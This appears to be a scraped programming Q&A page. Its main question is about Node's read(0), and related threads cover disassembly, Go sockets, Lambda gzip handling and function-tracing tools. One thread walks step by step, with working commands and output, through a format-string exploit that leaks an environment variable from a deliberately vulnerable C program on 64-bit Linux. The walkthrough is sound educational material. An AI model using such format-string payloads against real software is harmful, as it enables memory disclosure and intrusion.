What does read(0) in node stream do? - node.js

Could anyone illustrate how read(0) in node stream works, and in which case it is necessary?
The official read(0) doc is here. It says:
There are some cases where it is necessary to trigger a refresh of the underlying readable stream mechanisms, without actually consuming any data. In such cases, it is possible to call readable.read(0), which will always return null.
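The documented contract quoted above (read(0) returns null and consumes nothing) can be checked in isolation. The following is only a minimal sketch: the hand-fed Readable named source is a hypothetical stand-in for process.stdin, and it does not reproduce the timing-dependent stdin behaviour asked about below.

```javascript
const { Readable } = require('stream');

// Hypothetical stand-in for a real source: a Readable whose _read() does
// nothing, so the only data available is what we push by hand.
const source = new Readable({ read() {} });
source.push(Buffer.from('abc'));

const before = source.readableLength; // bytes buffered before read(0)
const zeroRead = source.read(0);      // documented to always return null
const after = source.readableLength;  // buffered bytes are left untouched
const chunk = source.read(3);         // this call actually consumes the data

console.log({ before, zeroRead, after, chunk: chunk.toString() });
```

If the sketch holds, before and after are equal and only the final read(3) hands back data.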
I ran into one case where read(0) is necessary. It comes from stream-handbook. The source code is:
process.stdin.on('readable', function () {
    var buf = process.stdin.read(3);
    console.dir(buf);
    process.stdin.read(0);
});
The result is:
$ (echo abc; sleep 1; echo def; sleep 1; echo ghi) | node consume2.js
<Buffer 61 62 63>
<Buffer 0a 64 65>
<Buffer 66 0a 67>
<Buffer 68 69 0a>
If I comment out the read(0) statement:
process.stdin.on('readable', function () {
    var buf = process.stdin.read(3);
    console.dir(buf);
    // process.stdin.read(0);
});
The result would be:
$ (echo abc; sleep 1; echo def; sleep 1; echo ghi) | node consume1.js
<Buffer 61 62 63>
<Buffer 0a 64 65>
<Buffer 66 0a 67>
I experimented with the above code and found that if I remove sleep 1 from the subshell command, the read(0) statement is no longer necessary.
I think the subshell sends an 'end of stream' event to consume1.js after sending ghi, but it seems consume1.js does not receive that event unless read(0) does something. When read(0) does something, the js file learns that there is an 'end of stream', and the readable event is triggered once more.
So my questions are:
What is read(0) doing here?
Why does read(0) become unnecessary when sleep 1 is removed from the shell command?
Can anyone provide more cases where read(0) is necessary? (I tried a file stream instead of stdin as the js file's input, and then read(0) is not necessary.)
Thanks.

Related

Disassembling Code inside of a C++ program

objdump -D file.o will output something like
2b: 47 rex.RXB
2c: 43 rex.XB
2d: 43 3a 20 rex.XB cmp (%r8),%spl
In my program I have a pointer to the instruction and need to disassemble the first instruction found (not the whole file). What would be the easiest way to do that? For example
uint8_t *instr_ptr = memory_location;
std::string human_readable = get_disassembly(instr_ptr);
// human_readable == "43 3a 20 rex.XB cmp (%r8),%spl"
Are there Linux headers/includes that do this already?
I've been googling but haven't found a good, straightforward solution.

Sending data with net Write: \r\n is sent as a literal string instead of a line ending

I want to send 'info\r\n' to a Redis server over a socket using the net package, but the data actually sent is 69 6e 66 6f 5c 72 5c 6e.
The data I want to send is 69 6e 66 6f 0d 0a; instead, \r\n is treated as a literal string and wrongly becomes 5c 72 5c 6e.
The data is a string in my code; I convert the string to []byte and call conn.Write.
This way of sending seems to be wrong. What is the correct way to send it?
Your data 69 6e 66 6f 5c 72 5c 6e is:
b := []byte{0x69, 0x6e, 0x66, 0x6f, 0x5c, 0x72, 0x5c, 0x6e}
fmt.Printf("%q\n", string(b))
Which outputs:
"info\\r\\n"
It contains a backslash, an r, another backslash and an n character at the end.
You want to send a carriage return \r and a newline character \n, so you must not send these "literally". \r and \n are each a single byte, not 2-character sequences.
Your data should be:
b = []byte{0x69, 0x6e, 0x66, 0x6f, '\r', '\n'}
fmt.Printf("%q\n", string(b))
Which outputs:
"info\r\n"
Or simply:
b = []byte("info\r\n")
fmt.Printf("%q\n", string(b))
Which outputs the same. Try the examples on the Go Playground.
Note that the string literal "info\r\n" is an interpreted string literal: the \r and \n sequences in it are interpreted as single characters (the carriage return and newline characters). This is detailed in Spec: String literals.

Reading an environment variable using the format string vulnerability in a 64 bit OS

I'm trying to read a value from the environment by using the format string vulnerability.
This type of vulnerability is documented all over the web, however the examples that I've found only cover 32 bits Linux, and my desktop's running a 64 bit Linux.
This is the code I'm using to run my tests on:
//fmt.c
#include <stdio.h>
#include <string.h>
int main (int argc, char *argv[]) {
    char string[1024];
    if (argc < 2)
        return 0;
    strcpy( string, argv[1] );
    printf( "vulnerable string: %s\n", string );
    printf( string );
    printf( "\n" );
}
After compiling that, I export my test variable and get its address. Then I pass the address to the program as a parameter, followed by a series of format specifiers to read values off the stack:
$ export FSTEST="Look at my horse, my horse is amazing."
$ echo $FSTEST
Look at my horse, my horse is amazing.
$ ./getenvaddr FSTEST ./fmt
FSTEST: 0x7fffffffefcb
$ printf '\xcb\xef\xff\xff\xff\x7f' | od -vAn -tx1c
cb ef ff ff ff 7f
313 357 377 377 377 177
$ ./fmt $(printf '\xcb\xef\xff\xff\xff\x7f')`python -c "print('%016lx.'*10)"`
vulnerable string: %016lx.%016lx.%016lx.%016lx.%016lx.%016lx.%016lx.%016lx.%016lx.%016lx.
00000000004052a0.0000000000000000.0000000000000000.00000000ffffffff.0000000000000060.
0000000000000001.00000060f7ffd988.00007fffffffd770.00007fffffffd770.30257fffffffefcb.
$ echo '\xcb\xef\xff\xff\xff\x7f%10$16lx'"\c" | od -vAn -tx1c
cb ef ff ff ff 7f 25 31 30 24 31 36 6c 78
313 357 377 377 377 177 % 1 0 $ 1 6 l x
$ ./fmt $(echo '\xcb\xef\xff\xff\xff\x7f%10$16lx'"\c")
vulnerable string: %10$16lx
31257fffffffefcb
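The 10th value contains the address I want to read from; however, it's not padded with 0s but with the value 3125 instead (0x25 and 0x31 are the ASCII codes for '%' and '1', the first two characters of the format specifier that follows the address).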
Is there a way to properly pad that value so I can read the environment variable with something like the '%s' format?
So, after experimenting for a while, I ran into a way to read an environment variable by using the format string vulnerability.
It's a bit sloppy, but hey - it works.
So, first the usual. I create an environment value and find its location:
$ export FSTEST="Look at my horse, my horse is amazing."
$ echo $FSTEST
Look at my horse, my horse is amazing.
$ ./getenvaddr FSTEST ./fmt
FSTEST: 0x7fffffffefcb
Now, no matter what I tried, putting the address before the format specifiers always ended up mixing the two, so I moved the address to the back and added some padding of my own, so that I could identify it and add more padding if needed.
Also, python and my environment don't get along with some escape sequences, so I ended up using a mix of the python one-liner and printf (with an extra '%' because of the way the second printf parses a single '%'; be sure to remove this extra '%' after you test it with od/hexdump/whathaveyou):
$ printf `python -c "print('%%016lx|' *1)"\
`$(printf '--------\xcb\xef\xff\xff\xff\x7f\x00') | od -vAn -tx1c
25 30 31 36 6c 78 7c 2d 2d 2d 2d 2d 2d 2d 2d cb
% 0 1 6 l x | - - - - - - - - 313
ef ff ff ff 7f
357 377 377 377 177
With that solved, next step would be to find either the padding or (if you're lucky) the address.
I'm repeating the format string 110 times, but your mileage might vary:
./fmt `python -c "print('%016lx|' *110)"\
`$(printf '--------\xcb\xef\xff\xff\xff\x7f\x00')
vulnerable string: %016lx|%016lx|%016lx|%016lx|%016lx|...|--------
00000000004052a0|0000000000000000|0000000000000000|fffffffffffffff3|
0000000000000324|...|2d2d2d2d2d2d7c78|7fffffffefcb2d2d|0000038000000300|
00007fffffffd8d0|00007ffff7ffe6d0|--------
The consecutive '2d' values are just the hex values for '-'
After adding more '-' for padding and testing, I ended up with something like this:
./fmt `python -c "print('%016lx|' *110)"\
`$(printf '------------------------------\xcb\xef\xff\xff\xff\x7f\x00')
vulnerable string: %016lx|%016lx|%016lx|%016lx|...|------------------------------
00000000004052a0|0000000000000000|0000000000000000|fffffffffffffff3|
000000000000033a|...|2d2d2d2d2d2d7c78|2d2d2d2d2d2d2d2d|2d2d2d2d2d2d2d2d|
2d2d2d2d2d2d2d2d|00007fffffffefcb|------------------------------
So, the address got pushed towards the very last format placeholder.
Let's modify the way we output these format placeholders so we can manipulate the last one in a more convenient way:
$ ./fmt `python -c "print('%016lx|' *109 + '%016lx|')"\
`$(printf '------------------------------\xcb\xef\xff\xff\xff\x7f\x00')
vulnerable string: %016lx|%016lx|%016lx|...|------------------------------
00000000004052a0|0000000000000000|0000000000000000|fffffffffffffff3|
000000000000033a|...|2d2d2d2d2d2d7c78|2d2d2d2d2d2d2d2d|2d2d2d2d2d2d2d2d|
2d2d2d2d2d2d2d2d|00007fffffffefcb|------------------------------
It should show the same result, but now it's possible to use an '%s' as the last placeholder.
Replacing '%016lx|' with just '%s|' won't work, because the extra padding is needed. So, I just add 4 extra '|' characters to compensate:
./fmt `python -c "print('%016lx|' *109 + '||||%s|')"\
`$(printf '------------------------------\xcb\xef\xff\xff\xff\x7f\x00')
vulnerable string: %016lx|%016lx|%016lx|...|||||%s|------------------------------
00000000004052a0|0000000000000000|0000000000000000|fffffffffffffff3|
000000000000033a|...|2d2d2d2d2d2d7c73|2d2d2d2d2d2d2d2d|2d2d2d2d2d2d2d2d|
2d2d2d2d2d2d2d2d|||||Look at my horse, my horse is amazing.|
------------------------------
Voilà, the environment variable got leaked.

Decompressing data received as binary data in lambda - incorrect header check

I want to send compressed data (gzip) to some URL that will trigger a (proxy) lambda function, that will decompress the data.
The lambda function (NodeJS 8):
let zlib = require('zlib');
exports.handler = async (event) => {
    let decompressedData = zlib.gunzipSync(event['body'])
    return {
        "statusCode": 200,
        "body": decompressedData.toString()
    };
};
I trigger it with a curl command to the URL (through API gateway), for some file that I compressed example.gz with gzip:
curl -X POST --data-binary @example.gz https://URL...
As a result, I get:
{"message": "Internal server error"}
And the error is (logs in Cloudwatch):
"errorMessage": "incorrect header check",
"errorType": "Error",
"stackTrace": [
"Gunzip.zlibOnError (zlib.js:153:15)",
"Gunzip._processChunk (zlib.js:411:30)",
"zlibBufferSync (zlib.js:144:38)",
"Object.gunzipSync (zlib.js:590:14)",
"exports.handler (/var/task/test_index.js:5:33)"
]
When I looked at the event['body'] itself, I see the exact data as I see in example.gz. Perhaps I need some special header? I just want to pass the data as is.
As Michael - sqlbot said, by default API Gateway can't pass binary data into a Lambda function.
What worked for me:
I added the header Content-Type: application/octet-stream in the curl command, and in the API gateway settings, on Binary Media Types I added application/octet-stream.
This way, the data is passed in base64, and afterwards I just converted the base64 data to a buffer:
let data = Buffer.from(event['body'], "base64")
And afterwards just decompress it.
For more information read here
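The decode-then-decompress step described in this answer can be sketched as follows. This is a minimal sketch, not the poster's exact function: the helper name decompressBody and the locally built sampleEvent are assumptions made for illustration, and the sample simply imitates a body that arrives base64-encoded once application/octet-stream is configured as a binary media type.

```javascript
const zlib = require('zlib');

// Decode the base64 body that API Gateway hands over, then gunzip it.
// decompressBody is a hypothetical helper name, not part of any AWS API.
function decompressBody(event) {
  const compressed = Buffer.from(event.body, 'base64');
  return zlib.gunzipSync(compressed).toString();
}

// Handler in the same shape as the one in the question; in a real Lambda
// it would be assigned to exports.handler.
async function handler(event) {
  return { statusCode: 200, body: decompressBody(event) };
}

// Local simulation (assumption): a gzip payload delivered as base64 text.
const sampleEvent = {
  body: zlib.gzipSync('{ "mydummy" : "json" }').toString('base64'),
};

console.log(decompressBody(sampleEvent)); // prints { "mydummy" : "json" }
```

Keeping the decoding in a small synchronous helper makes it easy to exercise locally without deploying anything.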
1/ First you need to build your gzip correctly: ensure that the original file name is not stored in the gzip header (the fourth byte is 08 in the first dump below and 00 in the second). See: curl command a gzipped POST body to an apache server
Wrong way :
echo '{ "mydummy" : "json" }' > body
gzip body
hexdump -C body.gz
00000000 1f 8b 08 08 20 08 30 59 00 03 62 6f 64 79 00 ab |.... .0Y..body..|
00000010 56 50 ca ad 4c 29 cd cd ad 54 52 b0 52 50 ca 2a |VP..L)...TR.RP.*|
00000020 ce cf 53 52 a8 e5 02 00 a6 6a 24 99 17 00 00 00 |..SR.....j$.....|
00000030
Good way :
echo '{ "mydummy" : "json" }' | gzip > body.gz
hexdump -C body.gz
00000000 1f 8b 08 00 08 0a 30 59 00 03 ab 56 50 ca ad 4c |......0Y...VP..L|
00000010 29 cd cd ad 54 52 b0 52 50 ca 2a ce cf 53 52 a8 |)...TR.RP.*..SR.|
00000020 e5 02 00 a6 6a 24 99 17 00 00 00 |....j$.....|
0000002b
2/ In curl don't forget to specify the content-encoding with
-H "Content-Encoding: gzip"
3/ In addition if you use express+compress you don't need to call zlib
curl -X POST "http://example.org/api/a" -H "Content-Encoding: gzip" -H "Content-Type: application/json" --data-binary @body.gz
router.post("/api/a", function(req, res){
    console.log(req.body); // { mydummy: 'json' }
});
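The difference between the two hexdumps in step 1 is the FLG byte of the gzip header: per RFC 1952, bit 3 (0x08) of the fourth byte is FNAME, which means a zero-terminated original file name follows the 10-byte fixed header. A minimal sketch for inspecting this, assuming a hypothetical helper named gzipFileName and using the leading bytes copied from the two dumps:

```javascript
// Returns the file name stored in a gzip header, or null if none is stored.
// gzipFileName is a hypothetical helper written for this illustration.
function gzipFileName(buf) {
  if (buf.length < 10 || buf[0] !== 0x1f || buf[1] !== 0x8b) {
    throw new Error('not a gzip stream');
  }
  const flg = buf[3];
  if ((flg & 0x08) === 0) return null;      // FNAME bit clear: no name stored
  let offset = 10;                          // end of the fixed-size header
  if (flg & 0x04) {                         // FEXTRA: skip XLEN and the extra field
    offset += 2 + buf.readUInt16LE(offset);
  }
  const end = buf.indexOf(0, offset);       // the name is zero-terminated
  return buf.toString('latin1', offset, end);
}

// Leading bytes of the "wrong way" and "good way" dumps above.
const wrongWay = Buffer.from('1f8b0808200830590003626f647900', 'hex');
const goodWay = Buffer.from('1f8b0800080a30590003', 'hex');

console.log(gzipFileName(wrongWay), gzipFileName(goodWay));
```

For the first dump the helper recovers the stored name, and for the second it reports that none is present.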

Tool to trace local function calls in Linux

I am looking for a tool like ltrace or strace that can trace locally defined functions in an executable. ltrace only traces dynamic library calls and strace only traces system calls. For example, given the following C program:
#include <stdio.h>
int triple ( int x )
{
    return 3 * x;
}
int main (void)
{
    printf("%d\n", triple(10));
    return 0;
}
Running the program with ltrace will show the call to printf since that is a standard library function (which is a dynamic library on my system) and strace will show all the system calls from the startup code, the system calls used to implement printf, and the shutdown code, but I want something that will show me that the function triple was called. Assuming that the local functions have not been inlined by an optimizing compiler and that the binary has not been stripped (symbols removed), is there a tool that can do this?
Edit
A couple of clarifications:
It is okay if the tool also provides trace information for non-local functions.
I don't want to have to recompile the program(s) with support for specific tools, the symbol information in the executable should be enough.
It would be really nice if I could use the tool to attach to existing processes like I can with ltrace/strace.
Assuming you only want to be notified for specific functions, you can do it like this:
Compile with debug information (as you already have symbol information, you probably also have enough debug info in).
given
#include <iostream>
int fac(int n) {
    if(n == 0)
        return 1;
    return n * fac(n-1);
}
int main()
{
    for(int i=0;i<4;i++)
        std::cout << fac(i) << std::endl;
}
Use gdb to trace:
[js@HOST2 cpp]$ g++ -g3 test.cpp
[js@HOST2 cpp]$ gdb ./a.out
(gdb) b fac
Breakpoint 1 at 0x804866a: file test.cpp, line 4.
(gdb) commands 1
Type commands for when breakpoint 1 is hit, one per line.
End with a line saying just "end".
>silent
>bt 1
>c
>end
(gdb) run
Starting program: /home/js/cpp/a.out
#0 fac (n=0) at test.cpp:4
1
#0 fac (n=1) at test.cpp:4
#0 fac (n=0) at test.cpp:4
1
#0 fac (n=2) at test.cpp:4
#0 fac (n=1) at test.cpp:4
#0 fac (n=0) at test.cpp:4
2
#0 fac (n=3) at test.cpp:4
#0 fac (n=2) at test.cpp:4
#0 fac (n=1) at test.cpp:4
#0 fac (n=0) at test.cpp:4
6
Program exited normally.
(gdb)
Here is what I do to collect all functions' addresses:
tmp=$(mktemp)
readelf -s ./a.out | gawk '
{
    if($4 == "FUNC" && $2 != 0) {
        print "# code for " $NF;
        print "b *0x" $2;
        print "commands";
        print "silent";
        print "bt 1";
        print "c";
        print "end";
        print "";
    }
}' > $tmp;
gdb --command=$tmp ./a.out;
rm -f $tmp
Note that instead of just printing the current frame (bt 1), you can do anything you like: print the value of some global, execute some shell command, or mail something if it hits the fatal_bomb_exploded function :) Sadly, gdb outputs some "Current Language changed" messages in between, but those are easily grepped out. No big deal.
System Tap can be used on a modern Linux box (Fedora 10, RHEL 5, etc.).
First download the para-callgraph.stp script.
Then run:
$ sudo stap para-callgraph.stp 'process("/bin/ls").function("*")' -c /bin/ls
0 ls(12631):->main argc=0x1 argv=0x7fff1ec3b038
276 ls(12631): ->human_options spec=0x0 opts=0x61a28c block_size=0x61a290
365 ls(12631): <-human_options return=0x0
496 ls(12631): ->clone_quoting_options o=0x0
657 ls(12631): ->xmemdup p=0x61a600 s=0x28
815 ls(12631): ->xmalloc n=0x28
908 ls(12631): <-xmalloc return=0x1efe540
950 ls(12631): <-xmemdup return=0x1efe540
990 ls(12631): <-clone_quoting_options return=0x1efe540
1030 ls(12631): ->get_quoting_style o=0x1efe540
See also: Observe, systemtap and oprofile updates
Using Uprobes (since Linux 3.5)
Assuming you wanted to trace all functions in ~/Desktop/datalog-2.2/datalog when calling it with the parameters -l ~/Desktop/datalog-2.2/add.lua ~/Desktop/datalog-2.2/test.dl
cd /usr/src/linux-`uname -r`/tools/perf
for i in `./perf probe -F -x ~/Desktop/datalog-2.2/datalog`; do sudo ./perf probe -x ~/Desktop/datalog-2.2/datalog $i; done
sudo ./perf record -agR $(for j in $(sudo ./perf probe -l | cut -d' ' -f3); do echo "-e $j"; done) ~/Desktop/datalog-2.2/datalog -l ~/Desktop/datalog-2.2/add.lua ~/Desktop/datalog-2.2/test.dl
sudo ./perf report -G
Assuming you can re-compile (no source change required) the code you want to trace with the gcc option -finstrument-functions, you can use etrace to get the function call graph.
Here is what the output looks like:
\-- main
| \-- Crumble_make_apple_crumble
| | \-- Crumble_buy_stuff
| | | \-- Crumble_buy
| | | \-- Crumble_buy
| | | \-- Crumble_buy
| | | \-- Crumble_buy
| | | \-- Crumble_buy
| | \-- Crumble_prepare_apples
| | | \-- Crumble_skin_and_dice
| | \-- Crumble_mix
| | \-- Crumble_finalize
| | | \-- Crumble_put
| | | \-- Crumble_put
| | \-- Crumble_cook
| | | \-- Crumble_put
| | | \-- Crumble_bake
On Solaris, truss (the strace equivalent) has the ability to filter the library to be traced. I was surprised when I discovered strace doesn't have such a capability.
KcacheGrind
https://kcachegrind.github.io/html/Home.html
Test program:
int f2(int i) { return i + 2; }
int f1(int i) { return f2(2) + i + 1; }
int f0(int i) { return f1(1) + f2(2); }
int pointed(int i) { return i; }
int not_called(int i) { return 0; }
int main(int argc, char **argv) {
    int (*f)(int);
    f0(1);
    f1(1);
    f = pointed;
    if (argc == 1)
        f(1);
    if (argc == 2)
        not_called(1);
    return 0;
}
Usage:
sudo apt-get install -y kcachegrind valgrind
# Compile the program as usual, no special flags.
gcc -ggdb3 -O0 -o main -std=c99 main.c
# Generate a callgrind.out.<PID> file.
valgrind --tool=callgrind ./main
# Open a GUI tool to visualize callgrind data.
kcachegrind callgrind.out.1234
You are now left inside an awesome GUI program that contains a lot of interesting performance data.
On the bottom right, select the "Call graph" tab. This shows an interactive call graph that correlates to performance metrics in other windows as you click the functions.
To export the graph, right click it and select "Export Graph". The exported PNG looks like this:
From that we can see that:
the root node is _start, which is the actual ELF entry point, and contains glibc initialization boilerplate
f0, f1 and f2 are called as expected from one another
pointed is also shown, even though we called it with a function pointer. It might not have been called if we had passed a command line argument.
not_called is not shown because it didn't get called in the run, because we didn't pass an extra command line argument.
The cool thing about valgrind is that it does not require any special compilation options.
Therefore, you could use it even if you don't have the source code, only the executable.
valgrind manages to do that by running your code through a lightweight "virtual machine".
Tested on Ubuntu 18.04.
$ sudo yum install frysk
$ ftrace -sym:'*' -- ./a.out
More: ftrace.1
If you externalize that function into an external library, you should also be able to see it getting called (with ltrace).
The reason this works is that ltrace puts itself between your app and the library; when all the code is internal to the one file, it can't intercept the call.
ie: ltrace xterm
spews stuff from X libraries, and X is hardly system.
Outside this, the only real way to do it is compile-time intercept via prof flags or debug symbols.
I just ran across this app, which looks interesting:
http://www.gnu.org/software/cflow/
But I don't think that's what you want.
If the functions aren't inlined, you might even have luck using objdump -d <program>.
For an example, let's take a look at the beginning of GCC 4.3.2's main routine:
$ objdump `which gcc` -d | grep '\(call\|main\)'
08053270 <main>:
8053270: 8d 4c 24 04 lea 0x4(%esp),%ecx
--
8053299: 89 1c 24 mov %ebx,(%esp)
805329c: e8 8f 60 ff ff call 8049330 <strlen@plt>
80532a1: 8d 04 03 lea (%ebx,%eax,1),%eax
--
80532cf: 89 04 24 mov %eax,(%esp)
80532d2: e8 b9 c9 00 00 call 805fc90 <xmalloc_set_program_name>
80532d7: 8b 5d 9c mov 0xffffff9c(%ebp),%ebx
--
80532e4: 89 04 24 mov %eax,(%esp)
80532e7: e8 b4 a7 00 00 call 805daa0 <expandargv>
80532ec: 8b 55 9c mov 0xffffff9c(%ebp),%edx
--
8053302: 89 0c 24 mov %ecx,(%esp)
8053305: e8 d6 2a 00 00 call 8055de0 <prune_options>
805330a: e8 71 ac 00 00 call 805df80 <unlock_std_streams>
805330f: e8 4c 2f 00 00 call 8056260 <gcc_init_libintl>
8053314: c7 44 24 04 01 00 00 movl $0x1,0x4(%esp)
--
805331c: c7 04 24 02 00 00 00 movl $0x2,(%esp)
8053323: e8 78 5e ff ff call 80491a0 <signal@plt>
8053328: 83 e8 01 sub $0x1,%eax
It takes a bit of effort to wade through all of the assembler, but you can see all possible calls from a given function. It's not as easy to use as gprof or some of the other utilities mentioned, but it has several distinct advantages:
You generally don't need to recompile an application to use it
It shows all possible function calls, whereas something like gprof will only show the executed function calls.
There is a shell script for automating the tracing of function calls with gdb, but it can't attach to a running process.
blog.superadditive.com/2007/12/01/call-graphs-using-the-gnu-project-debugger/
Copy of the page - http://web.archive.org/web/20090317091725/http://blog.superadditive.com/2007/12/01/call-graphs-using-the-gnu-project-debugger/
Copy of the tool - callgraph.tar.gz
http://web.archive.org/web/20090317091725/http://superadditive.com/software/callgraph.tar.gz
It dumps all functions from the program and generates a gdb command file with a breakpoint on each function. At each breakpoint, "backtrace 2" and "continue" are executed.
This script is rather slow on a big project (~ thousands of functions), so I added a filter on the function list (via egrep). It was very easy, and I use this script almost every day.
Gprof might be what you want
See traces, a tracing framework for Linux C/C++ applications:
https://github.com/baruch/traces#readme
It requires recompiling your code with its instrumentor, but will provide a listing of all functions, their parameters and return values. There's an interactive to allow easy navigation of large data samples.
Hopefully the callgrind or cachegrind tools for Valgrind will give you the information you seek.
NOTE: This is not the linux kernel based ftrace, but rather a tool I recently designed to accomplish local function tracing and control flow. Linux ELF x86_64/x86_32 are supported publicly.
https://github.com/leviathansecurity/ftrace
